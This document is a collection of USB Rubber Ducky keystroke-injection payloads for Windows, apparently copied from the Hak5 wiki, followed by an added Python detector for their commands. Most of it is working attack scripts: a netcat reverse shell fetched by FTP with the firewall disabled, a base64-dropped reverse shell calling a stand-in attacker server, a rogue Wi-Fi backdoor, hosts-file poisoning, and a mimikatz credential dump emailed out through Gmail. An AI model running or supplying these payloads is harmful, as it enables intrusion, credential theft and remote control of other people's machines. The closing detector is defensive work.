ponta

More scripts


1. Create an FTP script that logs you in to the FTP server and downloads netcat.
2. Delete the FTP script file.
3. Run netcat in daemon mode.
4. Run cmd.exe one more time to conceal the command we used in the run history.

Fill in the required information where you see the brackets.

DELAY 10000
GUI R
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING cd %USERPROFILE%
ENTER
DELAY 100
STRING netsh firewall set opmode disable
ENTER
DELAY 2000
STRING echo open [IP] [PORT] > ftp.txt
ENTER
DELAY 100
STRING echo [USERNAME]>> ftp.txt
ENTER
DELAY 100
STRING echo [PASSWORD]>> ftp.txt
ENTER
DELAY 100
STRING echo bin >> ftp.txt
ENTER
DELAY 100
STRING echo get nc.exe >> ftp.txt
ENTER
DELAY 100
STRING echo bye >> ftp.txt
ENTER
DELAY 100
STRING ftp -s:ftp.txt
ENTER
STRING del ftp.txt & exit
ENTER
DELAY 2000
GUI R
DELAY 200
STRING nc.exe [LISTENER IP] [LISTENER PORT] -e cmd.exe -d
ENTER
DELAY 2000
GUI R
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING exit
ENTER

Payload reverse shell

Author: Darren Kitchen with mad props to IllWill dabermania.blogspot.com/2011/04/copying-executable-from-teensy-using.html
Duckencoder: 1.0
Target: Windows 7
Description: Opens administrative CMD prompt, creates decoder.vbs containing code to convert base64 encoded ASCII to binary, creates text file including base64 ASCII of binary file to create reverse shell. Converts second file to exe with first file. Executes with host and port parameters. Props go to illwill for this payload. See dabermania.blogspot.com/2011/04/copying-executable-from-teensy-using.html

ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 600
LEFTARROW
ENTER
DELAY 400
STRING copy con c:\decoder.vbs
ENTER
STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0)
STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS =
STRING CreateObject("Scripting.FileSystemObject"):
ENTER
STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded =
STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function
STRING decodeBase64(base64):
ENTER
STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):
STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub
STRING writeBytes(file, bytes):Dim binaryStream:
ENTER
STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:
STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub
ENTER
CTRL z
ENTER
STRING copy con c:\reverse.txt
ENTER
CTRL z
ENTER
STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe
ENTER
STRING c:\reverse.exe evilserver.example.com 8080
ENTER
STRING exit
ENTER

Payload wifi backdoor

Author: Darren Kitchen
Duckencoder: 1.0
Target: Windows 7
Description: Open a CMD bypassing UAC then create a wireless access point with the SSID noobcake and WPA key 12345678, then lower firewall.

CONTROL ESCAPE
DELAY 200
STRING cmd
DELAY 200
MENU
DELAY 100
STRING a
DELAY 100
LEFTARROW
ENTER
DELAY 200
STRING netsh wlan set hostednetwork mode=allow ssid=noobcake key=12345678
ENTER
DELAY 100
STRING netsh wlan start hostednetwork
ENTER
DELAY 100
STRING netsh firewall set opmode disable
ENTER
STRING exit
ENTER

Payload local dns poisoning

The following is a local DNS poisoning attack that changes a host's hosts file. The host will then be redirected to the website of your choice (IP address) every time the user types the given domain name into their browser.

REM Author: ashbreeze96 and overwraith
GUI R
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
DELAY 50
STRING ECHO. >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
DELAY 50
ENTER
DELAY 50
STRING ECHO 10.0.0.1 ADMIN.COM >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
DELAY 50
ENTER
STRING exit
ENTER

Payload download mimikatz, grab passwords and email them via gmail

This payload:

1. Downloads the appropriate mimikatz version via HTTP (I used Dropbox)
2. Opens an admin prompt
3. Saves the mimikatz log to a file
4. Emails the log via Gmail

Please change these lines to something (keep the single quotes):

'url to 32bit mimikatz.exe'
'url to 64bit mimikatz.exe'
'gmailuser', 'gmail password'
'sending email account'
'email account to send report'

Sorry about the wacky delays!

REM Author: Pesce
REM Date: 10/20/2013
REM Note: Thanks for all the help everyone! This is my first attempt, don't be too upset!
REM -------------open command prompt with admin privileges
DELAY 3000
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 1000
CTRL-SHIFT ENTER
DELAY 1000
ALT y
ENTER
DELAY 300
REM -------------download appropriate mimikatz for architecture
STRING powershell if ([system.IntPtr]::Size -eq 4) { (new-object System.Net.WebClient).DownloadFile('http://url to 32bit mimikatz.exe','%TEMP%\pw.exe'); }else{ (new-object System.Net.WebClient).DownloadFile('http://url to 64bit mimikatz.exe','%TEMP%\pw.exe');}
ENTER
DELAY 5000
REM -------------get the passwords and save to c:\pwlog.txt
STRING %TEMP%\pw.exe > c:\pwlog.txt & type pwlog.txt;
ENTER
DELAY 2000
STRING privilege::debug
ENTER
DELAY 1000
STRING sekurlsa::logonPasswords full
ENTER
DELAY 1000
STRING exit
ENTER
DELAY 300
STRING del %TEMP%\pw.exe
ENTER
DELAY 300
REM -------------email log via gmail
STRING powershell
ENTER
DELAY 300
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('gmailuser', 'gmail password');
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = 'sending email account'
ENTER
STRING $ReportEmail.To.Add('email account to send report')
ENTER
STRING $ReportEmail.Subject = 'Duck Report'
ENTER
STRING $ReportEmail.Body = 'Attached is your duck report.'
ENTER
STRING $ReportEmail.Attachments.Add('c:\pwlog.txt')
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
DELAY 1000
STRING exit
ENTER
REM ---------------------delete and end
STRING del c:\pwlog.txt
ENTER
DELAY 300
STRING exit
ENTER
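From the defender's side, the scripts above share a handful of host-impacting commands (firewall off, hosted Wi-Fi network, hosts-file edit, scripted FTP download, netcat with -e cmd.exe, mimikatz). The Python below is an added example, not code from the original post or the Hak5 wiki: it reconstructs the lines a Ducky script would type, joining split STRINGs and expanding REPEAT, and flags those commands; the indicator list, the address 192.0.2.10 and the sample script are constructed here.

```python
import re

# Watchlist drawn from the payloads above (assumed here; not exhaustive).
INDICATORS = {
    r"netsh\s+firewall\s+set\s+opmode\s+disable": "host firewall disabled",
    r"netsh\s+wlan\s+set\s+hostednetwork": "rogue hosted Wi-Fi network",
    r"drivers\\etc\\hosts": "hosts file edit (local DNS poisoning)",
    r"ftp\s+-s:": "scripted FTP download",
    r"\bnc(\.exe)?\b.*-e\s+cmd\.exe": "netcat shell (-e cmd.exe)",
    r"sekurlsa::logonpasswords": "mimikatz credential dump",
}

def reconstruct(script):
    """Lines a Ducky script types at the target: STRINGs join until ENTER,
    REPEAT n re-runs the previous command, DELAY/REM/other keys are skipped."""
    typed, buf, prev = [], "", ("", "")
    for raw in script.splitlines():
        cmd, _, arg = raw.rstrip().partition(" ")
        if not cmd or cmd == "REM":
            continue
        count, (cmd, arg) = (int(arg), prev) if cmd == "REPEAT" else (1, (cmd, arg))
        for _ in range(count):
            if cmd == "STRING":
                buf += arg
            elif cmd == "ENTER":
                typed.append(buf)
                buf = ""
        prev = (cmd, arg)
    return typed + ([buf] if buf else [])

def triage(script):
    """(typed line, indicator) pairs; case-insensitive because cmd.exe is."""
    return [(line, what) for line in reconstruct(script)
            for pattern, what in INDICATORS.items()
            if re.search(pattern, line, re.IGNORECASE)]

# Constructed sample in the style of the payloads above (not from the page).
SAMPLE = """REM constructed sample
STRING netsh firewall set opmode disable
ENTER
STRING ECHO 10.0.0.1 ADMIN.COM >> C:\\WINDOWS\\SYSTEM32\\DRIVERS\\ETC\\HOSTS
ENTER
STRING nc.exe 192.0.2.10 4444
STRING  -e cmd.exe -d
ENTER
STRING exit
ENTER
REPEAT 2
"""
```

Running `triage(SAMPLE)` yields one hit each for the firewall, hosts-file and netcat lines; the trailing REPEAT expands to two empty lines, as the extra ENTERs would at a real prompt.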

Source: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads
